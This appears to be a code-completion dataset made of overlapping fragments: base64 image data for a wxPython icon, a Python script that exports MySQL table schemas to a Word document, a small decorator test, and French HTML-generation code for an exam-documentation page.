"\"QRQqnpMKSti5PWjY9KVbGQwSxVgpppqiH+FzG9/EYTHrVM4sNIZhpKWdSMsvQdbsIN971P0x\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"wzR2IO3Io0ncWsqKcyfi7IsCJdbiLi3l35vgKEOcuuLc5hiZhTkpmhEh2fKdNDBEAwYKEPdU\" \"Qx6dyfibwiShQjrkJ2ueosTJFOKC6SvzeFJV0tkOTM+dinttdDapqspMLfeSOGAh1tv5qKtD\" \"Nx+ifAT4FMayPHKm8DrdfhOCnuvw0fIeXxJ9fhl+rmSE1E39azc8Dc2JuCwvpgSdsFzMPc+j\" \"qO0s8O5O/GjtSux5+ZdZSbeBIE+H8MyZIkrg5w508fCnRHxKOlZWjivnL8DmECuhb2o1cFbS\" \"H3EtOnxptDCamllJPjwPNLScoQf1tMycgtUmQ2vqpKUkow+waHCy8ZQi5HYhd3Yy7iiGR5aZ\" \"Zyr3SCEeTtB7h/GXk8fZA67duAILGXUsLQ6HmWcxc4E5ZGf1CvG7xztCA6PCp6z2PFPTo6wv\" \"<KEY>\" \"<KEY>\" \"<KEY>\"",
"C:\\Python27\\Scripts\\img2py # from wx.lib.embeddedimage import PyEmbeddedImage fu4028 = PyEmbeddedImage( \"iVBORw0KGgoAAAANSUhEUgAAACgAAAAcCAYAAAATFf3WAAAAAXNSR0IArs4c6QAAAARnQU1B\" \"AACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAAAh8SURBVFhHzVgLbFTHFT379r/rXa/t\" \"XZvFv1ITjCGJaQsEEFSiqQrBNIUAhrZpcFJIqqZRKpGojUgl1OZD2gQQARGpQQ0NpJBGClIk\" \"QwMVpC3GccDm42AwNviDvfauP7vr/f9ez7x9jXGLqkJbiTO6fjPv3bn3zp1778xaIxO4iyGp\"",
"\"<KEY> \"<KEY>\" \"<KEY>wAYosTeQHoCfLcA2yuZlq32iVuXMwlRRAU8igcHRUQyFQhijsX5Sl9+Px59/Htrv\" \"<KEY>dCGPzMa3TQ0gR4mzRkcwfIVs7Bv3y5o\" \"tVpVVRapML27JQ5XuwtWyYqwssgY08+Hq2yVVZWYcd8MlZsJde4cHO1XkOcsoDs18ItkSSbR\" \"MzLCEuWDJGW44hSQK+dCO0Blogxxu4OaXpxf9Bx+9psHca37KD6VN+Onf5yM2k2laGx6Cx99\" \"eBAGBvQ/Q47KyHRolJizMI4Nkpkxq1Ni2cpY77jQoXJmkaYRRi25rXbGnhGShgEmSTAbjOjr\" \"6uLcKLmGgcBAAGk/40uMx0ge4Jn1T+Hx576DL5VVCFmoWb0Iv3j9aTwwZ64yvhW0Th1SSy0U\" \"KcMzloY/w1immiBjt5+rf2jtMpUzC8O0KgxxUUODY/AGkox7CWMJqg+OYeGShzhTxPw/SBQl\" \"QRQqnpMKSti5PWjY9KVbGQwSxVgpppqiH+FzG9/EYTHrVM4sNIZhpKWdSMsvQdbsIN971P0x\" \"<KEY>\" \"<KEY>\" \"<KEY>\"",
"\"tVpVVRapML27JQ5XuwtWyYqwssgY08+Hq2yVVZWYcd8MlZsJde4cHO1XkOcsoDs18ItkSSbR\" \"MzLCEuWDJGW44hSQK+dCO0Blogxxu4OaXpxf9Bx+9psHca37KD6VN+Onf5yM2k2laGx6Cx99\" \"eBAGBvQ/Q47KyHRolJizMI4Nkpkxq1Ni2cpY77jQoXJmkaYRRi25rXbGnhGShgEmSTAbjOjr\" \"6uLcKLmGgcBAAGk/40uMx0ge4Jn1T+Hx576DL5VVCFmoWb0Iv3j9aTwwZ64yvhW0Th1SSy0U\" \"KcMzloY/w1immiBjt5+rf2jtMpUzC8O0KgxxUUODY/AGkox7CWMJqg+OYeGShzhTxPw/SBQl\" \"QRQqnpMKSti5PWjY9KVbGQwSxVgpppqiH+FzG9/EYTHrVM4sNIZhpKWdSMsvQdbsIN971P0x\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"wzR2IO3Io0ncWsqKcyfi7IsCJdbiLi3l35vgKEOcuuLc5hiZhTkpmhEh2fKdNDBEAwYKEPdU\" \"Qx6dyfibwiShQjrkJ2ueosTJFOKC6SvzeFJV0tkOTM+dinttdDapqspMLfeSOGAh1tv5qKtD\" \"Nx+ifAT4FMayPHKm8DrdfhOCnuvw0fIeXxJ9fhl+rmSE1E39azc8Dc2JuCwvpgSdsFzMPc+j\" \"qO0s8O5O/GjtSux5+ZdZSbeBIE+H8MyZIkrg5w508fCnRHxKOlZWjivnL8DmECuhb2o1cFbS\"",
"\"<KEY>\" \"<KEY>\" \"<KEY>\" \"wzR2IO3Io0ncWsqKcyfi7IsCJdbiLi3l35vgKEOcuuLc5hiZhTkpmhEh2fKdNDBEAwYKEPdU\" \"Qx6dyfibwiShQjrkJ2ueosTJFOKC6SvzeFJV0tkOTM+dinttdDapqspMLfeSOGAh1tv5qKtD\" \"Nx+ifAT4FMayPHKm8DrdfhOCnuvw0fIeXxJ9fhl+rmSE1E39azc8Dc2JuCwvpgSdsFzMPc+j\" \"qO0s8O5O/GjtSux5+ZdZSbeBIE+H8MyZIkrg5w508fCnRHxKOlZWjivnL8DmECuhb2o1cFbS\" \"H3EtOnxptDCamllJPjwPNLScoQf1tMycgtUmQ2vqpKUkow+waHCy8ZQi5HYhd3Yy7iiGR5aZ\" \"Zyr3SCEeTtB7h/GXk8fZA67duAILGXUsLQ6HmWcxc4E5ZGf1CvG7xztCA6PCp6z2PFPTo6wv\" \"<KEY>\" \"<KEY>\" \"<KEY>\" \"<KEY>\"",
"PyEmbeddedImage( \"iVBORw0KGgoAAAANSUhEUgAAACgAAAAcCAYAAAATFf3WAAAAAXNSR0IArs4c6QAAAARnQU1B\" \"AACxjwv8YQUAAAAJcEhZcwAADsIAAA7CARUoSoAAAAh8SURBVFhHzVgLbFTHFT379r/rXa/t\" \"XZvFv1ITjCGJaQsEEFSiqQrBNIUAhrZpcFJIqqZRKpGojUgl1OZD2gQQARGpQQ0NpJBGClIk\" \"QwMVpC3GccDm42AwNviDvfauP7vr/f9ez7x9jXGLqkJbiTO6fjPv3bn3zp1778xaIxO4iyGp\" \"z7sWEwwc9Y9gNDiijoBoLATfkFcdAZlMHB7vgDr6z+D1eRGMBNXRv0ckFoNnYKL8L7Z4+ey3\" \"EAoGMCy1wFY8iMe+8Qb+sP8YRuJtMJd34/sLfo6j9Z3oG20Fii7inV278dU59ytCbgVfjw9H\" \"fnwEna2daDW2onRZKXZs36F+/Ve8/+yz6G1txSUaeJYmnW5qgjknB5pIOCYvLzuFacOliMOH\" \"QXyOFhzEN7ELFiTQj3PowAmU4FuYjnnoQxM8aMNpvIq9b/8eT/xwnapiHKHeEFrKWuBi62Pr\" \"ZdvJhvuA5gvNKlcWwjuNGzciLxJB1GrF514v2vr78cpnn6Hr+nVIF/+aRMnw12CDA3rYYSQV\" \"oJgGlXNsVca5VFSGe5TvBmXsRD5m41evbM1quQkZttBrIVSzOdlsbBa2r7O1XGxBc9NEA0db\" \"WlCRTqO4pAQWoxE2gwF5djummUx4e/duSHlGK1XmwO1wwaazQwMdA9MIp9UChyGfI70ydhh1\" \"cJpz2TeQTJyTB29/BIOD4zEqkPamoT2m5Xc7nHYncjQ5nG3kLAOmsNUfqlc5s0hduoT83FzY\"",
"\"z7sWEwwc9Y9gNDiijoBoLATfkFcdAZlMHB7vgDr6z+D1eRGMBNXRv0ckFoNnYKL8L7Z4+ey3\" \"EAoGMCy1wFY8iMe+8Qb+sP8YRuJtMJd34/sLfo6j9Z3oG20Fii7inV278dU59ytCbgVfjw9H\" \"fnwEna2daDW2onRZKXZs36F+/Ve8/+yz6G1txSUaeJYmnW5qgjknB5pIOCYvLzuFacOliMOH\" \"QXyOFhzEN7ELFiTQj3PowAmU4FuYjnnoQxM8aMNpvIq9b/8eT/xwnapiHKHeEFrKWuBi62Pr\" \"ZdvJhvuA5gvNKlcWwjuNGzciLxJB1GrF514v2vr78cpnn6Hr+nVIF/+aRMnw12CDA3rYYSQV\" \"oJgGlXNsVca5VFSGe5TvBmXsRD5m41evbM1quQkZttBrIVSzOdlsbBa2r7O1XGxBc9NEA0db\" \"WlCRTqO4pAQWoxE2gwF5djummUx4e/duSHlGK1XmwO1wwaazQwMdA9MIp9UChyGfI70ydhh1\" \"cJpz2TeQTJyTB29/BIOD4zEqkPamoT2m5Xc7nHYncjQ5nG3kLAOmsNUfqlc5s0hduoT83FzY\" \"CgvhtNlg1OthIk3Ky8Pf6ushZVLCJC2ifsFtoDkmjrSgxxFJhpGmR2T+jSQ0CMdjZEoLRm5+\" \"<KEY> \"<KEY>\" \"<KEY>wAYosTeQHoCfLcA2yuZlq32iVuXMwlRRAU8igcHRUQyFQhijsX5Sl9+Px59/Htrv\" \"<KEY>dCGPzMa3TQ0gR4mzRkcwfIVs7Bv3y5o\""
] |
[
"tb_rs: # print(r[0], r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name",
"conn.cursor() as cursor: cursor.execute(\"SHOW TABLES\") tb_list = cursor.fetchall() doc = gen_doc('数据库表结构说明', 'FEIZHANG') for",
"cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] #",
"-*- encoding: utf-8 -*- # __author__ = 'FeiZhang <EMAIL>' __date__ = '2019-07-20' from",
"\"\"\" entry point :return: \"\"\" try: my_conn = MyConn(DB_CONFIG) conn = my_conn.conn with",
"import gen_doc, doc_append_table def main(): \"\"\" entry point :return: \"\"\" try: my_conn =",
"cursor: cursor.execute(\"SHOW TABLES\") tb_list = cursor.fetchall() doc = gen_doc('数据库表结构说明', 'FEIZHANG') for tb in",
"tb_name, tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\") as file: doc.save(output_file_name) finally: conn.close()",
"Field | Type | Collation | Null | Key | Default | Extra",
"= my_conn.conn with conn.cursor() as cursor: cursor.execute(\"SHOW TABLES\") tb_list = cursor.fetchall() doc =",
"tb_list = cursor.fetchall() doc = gen_doc('数据库表结构说明', 'FEIZHANG') for tb in tb_list: print(tb) tb_name",
"# -*- encoding: utf-8 -*- # __author__ = 'FeiZhang <EMAIL>' __date__ = '2019-07-20'",
"r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with",
"table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\", \"栏位说明\") #",
"TABLES\") tb_list = cursor.fetchall() doc = gen_doc('数据库表结构说明', 'FEIZHANG') for tb in tb_list: print(tb)",
"\"栏位说明\") # for r in tb_rs: # print(r[0], r[1], r[3], r[4], r[5], r[8])",
"tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\", \"栏位说明\") # for",
"info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0]",
"utf-8 -*- # __author__ = 'FeiZhang <EMAIL>' __date__ = '2019-07-20' from mysqlconn import",
"| Privileges | Comment tb_rs = cursor.fetchall() # get table comment info cursor.execute(\"SELECT",
"as cursor: cursor.execute(\"SHOW TABLES\") tb_list = cursor.fetchall() doc = gen_doc('数据库表结构说明', 'FEIZHANG') for tb",
"= '2019-07-20' from mysqlconn import MyConn from settings import DB_CONFIG from gendocx import",
"# __author__ = 'FeiZhang <EMAIL>' __date__ = '2019-07-20' from mysqlconn import MyConn from",
"{}\".format(tb_name)) # Field | Type | Collation | Null | Key | Default",
"INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\",",
"main(): \"\"\" entry point :return: \"\"\" try: my_conn = MyConn(DB_CONFIG) conn = my_conn.conn",
"Collation | Null | Key | Default | Extra | Privileges | Comment",
"= 'FeiZhang <EMAIL>' __date__ = '2019-07-20' from mysqlconn import MyConn from settings import",
"FROM {}\".format(tb_name)) # Field | Type | Collation | Null | Key |",
"cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\", \"栏位说明\") # for r in tb_rs:",
"tb[0] cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) # Field | Type | Collation |",
"MyConn from settings import DB_CONFIG from gendocx import gen_doc, doc_append_table def main(): \"\"\"",
"output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\") as file: doc.save(output_file_name) finally: conn.close() if __name__",
"with conn.cursor() as cursor: cursor.execute(\"SHOW TABLES\") tb_list = cursor.fetchall() doc = gen_doc('数据库表结构说明', 'FEIZHANG')",
"Extra | Privileges | Comment tb_rs = cursor.fetchall() # get table comment info",
"= cursor.fetchall() # get table comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\",
"tb_rs = cursor.fetchall() # get table comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE",
"my_conn.conn with conn.cursor() as cursor: cursor.execute(\"SHOW TABLES\") tb_list = cursor.fetchall() doc = gen_doc('数据库表结构说明',",
"= MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor() as cursor: cursor.execute(\"SHOW TABLES\") tb_list =",
"| Type | Collation | Null | Key | Default | Extra |",
"cursor.fetchall() # get table comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND",
"print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) # Field | Type",
"= gen_doc('数据库表结构说明', 'FEIZHANG') for tb in tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL",
"r[3], r[4], r[5], r[8]) doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name,",
"mysqlconn import MyConn from settings import DB_CONFIG from gendocx import gen_doc, doc_append_table def",
"\"\"\" try: my_conn = MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor() as cursor: cursor.execute(\"SHOW",
"__date__ = '2019-07-20' from mysqlconn import MyConn from settings import DB_CONFIG from gendocx",
"\"数据类型\", \"Null\", \"Key\", \"Default\", \"栏位说明\") # for r in tb_rs: # print(r[0], r[1],",
"= cursor.fetchall() doc = gen_doc('数据库表结构说明', 'FEIZHANG') for tb in tb_list: print(tb) tb_name =",
"# get table comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'],",
"MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor() as cursor: cursor.execute(\"SHOW TABLES\") tb_list = cursor.fetchall()",
"\"Null\", \"Key\", \"Default\", \"栏位说明\") # for r in tb_rs: # print(r[0], r[1], r[3],",
"for tb in tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name))",
"= \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\") as file: doc.save(output_file_name) finally: conn.close() if __name__ ==",
"cursor.fetchall() doc = gen_doc('数据库表结构说明', 'FEIZHANG') for tb in tb_list: print(tb) tb_name = tb[0]",
"in tb_rs: # print(r[0], r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc, tb_rs, tb_name, tb_comment)",
"= tb[0] cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) # Field | Type | Collation",
"tb_comment = cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\", \"栏位说明\") # for r",
"\"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\") as file: doc.save(output_file_name) finally: conn.close() if __name__ == '__main__':",
"doc_append_table def main(): \"\"\" entry point :return: \"\"\" try: my_conn = MyConn(DB_CONFIG) conn",
"r[8]) doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\") as file:",
"point :return: \"\"\" try: my_conn = MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor() as",
"Type | Collation | Null | Key | Default | Extra | Privileges",
"conn = my_conn.conn with conn.cursor() as cursor: cursor.execute(\"SHOW TABLES\") tb_list = cursor.fetchall() doc",
"FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\", \"数据类型\",",
"r[5], r[8]) doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\") as",
"with open(output_file_name, \"w\") as file: doc.save(output_file_name) finally: conn.close() if __name__ == '__main__': main()",
"<EMAIL>' __date__ = '2019-07-20' from mysqlconn import MyConn from settings import DB_CONFIG from",
"tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) # Field |",
"= cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\", \"栏位说明\") # for r in",
"'2019-07-20' from mysqlconn import MyConn from settings import DB_CONFIG from gendocx import gen_doc,",
"doc = gen_doc('数据库表结构说明', 'FEIZHANG') for tb in tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW",
"tb_rs, tb_name, tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\") as file: doc.save(output_file_name) finally:",
"cursor.execute(\"SHOW TABLES\") tb_list = cursor.fetchall() doc = gen_doc('数据库表结构说明', 'FEIZHANG') for tb in tb_list:",
"from settings import DB_CONFIG from gendocx import gen_doc, doc_append_table def main(): \"\"\" entry",
"__author__ = 'FeiZhang <EMAIL>' __date__ = '2019-07-20' from mysqlconn import MyConn from settings",
"print(r[0], r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db'])",
"'FeiZhang <EMAIL>' __date__ = '2019-07-20' from mysqlconn import MyConn from settings import DB_CONFIG",
"print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\", \"栏位说明\") # for r in tb_rs: # print(r[0],",
"Privileges | Comment tb_rs = cursor.fetchall() # get table comment info cursor.execute(\"SELECT table_comment",
"\"Default\", \"栏位说明\") # for r in tb_rs: # print(r[0], r[1], r[3], r[4], r[5],",
"import DB_CONFIG from gendocx import gen_doc, doc_append_table def main(): \"\"\" entry point :return:",
"| Key | Default | Extra | Privileges | Comment tb_rs = cursor.fetchall()",
"| Default | Extra | Privileges | Comment tb_rs = cursor.fetchall() # get",
"table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\",",
"-*- # __author__ = 'FeiZhang <EMAIL>' __date__ = '2019-07-20' from mysqlconn import MyConn",
":return: \"\"\" try: my_conn = MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor() as cursor:",
"my_conn = MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor() as cursor: cursor.execute(\"SHOW TABLES\") tb_list",
"settings import DB_CONFIG from gendocx import gen_doc, doc_append_table def main(): \"\"\" entry point",
"tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) # Field | Type |",
"gendocx import gen_doc, doc_append_table def main(): \"\"\" entry point :return: \"\"\" try: my_conn",
"try: my_conn = MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor() as cursor: cursor.execute(\"SHOW TABLES\")",
"table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\",",
"doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\") as file: doc.save(output_file_name)",
"for r in tb_rs: # print(r[0], r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc, tb_rs,",
"WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\", \"Key\",",
"Comment tb_rs = cursor.fetchall() # get table comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES",
"import MyConn from settings import DB_CONFIG from gendocx import gen_doc, doc_append_table def main():",
"from mysqlconn import MyConn from settings import DB_CONFIG from gendocx import gen_doc, doc_append_table",
"\"Key\", \"Default\", \"栏位说明\") # for r in tb_rs: # print(r[0], r[1], r[3], r[4],",
"AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment = cursor.fetchone()[0] # print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\", \"栏位说明\")",
"FIELDS FROM {}\".format(tb_name)) # Field | Type | Collation | Null | Key",
"in tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) # Field",
"table comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment",
"# Field | Type | Collation | Null | Key | Default |",
"'FEIZHANG') for tb in tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS FROM",
"cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) # Field | Type | Collation | Null",
"gen_doc('数据库表结构说明', 'FEIZHANG') for tb in tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS",
"Key | Default | Extra | Privileges | Comment tb_rs = cursor.fetchall() #",
"encoding: utf-8 -*- # __author__ = 'FeiZhang <EMAIL>' __date__ = '2019-07-20' from mysqlconn",
"Default | Extra | Privileges | Comment tb_rs = cursor.fetchall() # get table",
"r in tb_rs: # print(r[0], r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc, tb_rs, tb_name,",
"r[4], r[5], r[8]) doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\")",
"DB_CONFIG from gendocx import gen_doc, doc_append_table def main(): \"\"\" entry point :return: \"\"\"",
"Null | Key | Default | Extra | Privileges | Comment tb_rs =",
"| Null | Key | Default | Extra | Privileges | Comment tb_rs",
"def main(): \"\"\" entry point :return: \"\"\" try: my_conn = MyConn(DB_CONFIG) conn =",
"| Collation | Null | Key | Default | Extra | Privileges |",
"comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name)) tb_comment =",
"gen_doc, doc_append_table def main(): \"\"\" entry point :return: \"\"\" try: my_conn = MyConn(DB_CONFIG)",
"get table comment info cursor.execute(\"SELECT table_comment FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='{}'\\ AND table_name='{}'\".format(DB_CONFIG['db'], tb_name))",
"# print(r[0], r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc, tb_rs, tb_name, tb_comment) output_file_name =",
"| Comment tb_rs = cursor.fetchall() # get table comment info cursor.execute(\"SELECT table_comment FROM",
"| Extra | Privileges | Comment tb_rs = cursor.fetchall() # get table comment",
"from gendocx import gen_doc, doc_append_table def main(): \"\"\" entry point :return: \"\"\" try:",
"# for r in tb_rs: # print(r[0], r[1], r[3], r[4], r[5], r[8]) doc_append_table(doc,",
"# print(\"列名\", \"数据类型\", \"Null\", \"Key\", \"Default\", \"栏位说明\") # for r in tb_rs: #",
"entry point :return: \"\"\" try: my_conn = MyConn(DB_CONFIG) conn = my_conn.conn with conn.cursor()",
"tb in tb_list: print(tb) tb_name = tb[0] cursor.execute(\"SHOW FULL FIELDS FROM {}\".format(tb_name)) #",
"FULL FIELDS FROM {}\".format(tb_name)) # Field | Type | Collation | Null |",
"tb_comment) output_file_name = \"outputdoc/{}.docx\".format(DB_CONFIG['db']) with open(output_file_name, \"w\") as file: doc.save(output_file_name) finally: conn.close() if"
] |
[
"from .. import echo_args def test_avimadsen(): wrapped_echo_args = add_user_tag(echo_args) print(wrapped_echo_args('test1', 'test2')) assert(hasattr(wrapped_echo_args, '__user_tag__')",
".. import echo_args def test_avimadsen(): wrapped_echo_args = add_user_tag(echo_args) print(wrapped_echo_args('test1', 'test2')) assert(hasattr(wrapped_echo_args, '__user_tag__') and",
"import add_user_tag from .. import echo_args def test_avimadsen(): wrapped_echo_args = add_user_tag(echo_args) print(wrapped_echo_args('test1', 'test2'))",
"import echo_args def test_avimadsen(): wrapped_echo_args = add_user_tag(echo_args) print(wrapped_echo_args('test1', 'test2')) assert(hasattr(wrapped_echo_args, '__user_tag__') and (wrapped_echo_args.__user_tag__",
"from ..avimadsen import add_user_tag from .. import echo_args def test_avimadsen(): wrapped_echo_args = add_user_tag(echo_args)",
"echo_args def test_avimadsen(): wrapped_echo_args = add_user_tag(echo_args) print(wrapped_echo_args('test1', 'test2')) assert(hasattr(wrapped_echo_args, '__user_tag__') and (wrapped_echo_args.__user_tag__ ==",
"def test_avimadsen(): wrapped_echo_args = add_user_tag(echo_args) print(wrapped_echo_args('test1', 'test2')) assert(hasattr(wrapped_echo_args, '__user_tag__') and (wrapped_echo_args.__user_tag__ == 'avimadsen'))",
"add_user_tag from .. import echo_args def test_avimadsen(): wrapped_echo_args = add_user_tag(echo_args) print(wrapped_echo_args('test1', 'test2')) assert(hasattr(wrapped_echo_args,",
"..avimadsen import add_user_tag from .. import echo_args def test_avimadsen(): wrapped_echo_args = add_user_tag(echo_args) print(wrapped_echo_args('test1',"
] |
[
"les fichiers HTML si il n'existe pas if not os.path.exists(\"./pagesWeb/\"): os.mkdir(\"./pagesWeb/\") # On",
"et utilisation </h3> <p>La procédure a été testé sous <b>Linux</b> uniquement. <ul> <li>Télécharger",
"\"\"\" </body>\\n </html>\\n \"\"\" ]) #On ferme le fichier indexHTML.close() if __name__ ==",
"On ajoute le doctype et le head for elt in docTypeHeadStyle: indexHTML.writelines(elt) #",
"le paquet python <a href=\"https://pdoc3.github.io/pdoc/\" target=\"_blank\"> pdoc3</a> </p> <h3>Auteur</h3> <p><NAME></p> <h3> Installation et",
"polynésie 2020<br><br> Pour générer la documentation il faut installer le paquet python <a",
"va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype",
"sur le site de l'APMEP<br> Pour le moment le test se fait sur",
"fait les imports nécessaires selon le contexte # Pour générer les fichiers HTML",
"le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir les fichiers pdf</span></a> <a class=\"navButton\" href=\"../exercices_corrections_pdf_crop/\"",
"le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a",
"au format *.tex dans le dossier <b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à",
"HTML if __name__ == \"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes import",
"écriture le fichier html qui va recevoir le code indexHTML = open(\"./pagesWeb/index.html\", \"w\")",
"sont générés dans le dossier <b>docs/pyPack</b><br><br> Les fichiers HTML sont générés dans le",
"un répertoire, ici pour y mettre les fichiers HTML import os # On",
"Les fichiers HTML sont générés dans le dossier <b>pagesWeb</b><br><br> <a class=\"navButton\" href=\"../exercices_corrections_pdf/\" target=\"_blank\"><span>voir",
"imports nécessaires selon le contexte # Pour pouvoir créer un répertoire, ici pour",
"target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3> \"\"\"",
"code indexHTML = open(\"./pagesWeb/index.html\", \"w\") # On ajoute le doctype et le head",
"# Pour générer les fichiers HTML if __name__ == \"__main__\": from HTML_constantes import",
"\"\"\" ]) # On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ])",
"générer les fichiers HTML if __name__ == \"__main__\": from HTML_constantes import * else:",
"<b>sujets_corrections_tex</b></li> <li>Lancer le script python <b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual",
"<b>programmePrincipal.py</b> à la racine du projet.</li> <li>Sous <b>Visual Studio Code</b> lancer Live server",
"l'APMEP<br> Pour le moment le test se fait sur le premier exo du",
"Live server et aller dans le dossier <b>PagesWeb</b> et lancer index.html</li> </ul> </p>",
"href=\"../tex_a_compiler/dnb_2013_04_pondichery_1.tex\" target=\"_blank\"><span>télécharger le fichier source tex </span></a> </p> <h3> License <a href=\"https://choosealicense.com/licenses/mit/\" target=\"_blank\">MIT</a><h3>",
"]) # On ferme le body indexHTML.writelines([ \"\"\" </body>\\n </html>\\n \"\"\" ]) #On",
"if __name__ == \"__main__\": from HTML_constantes import * else: from pyPack.HTML_constantes import *",
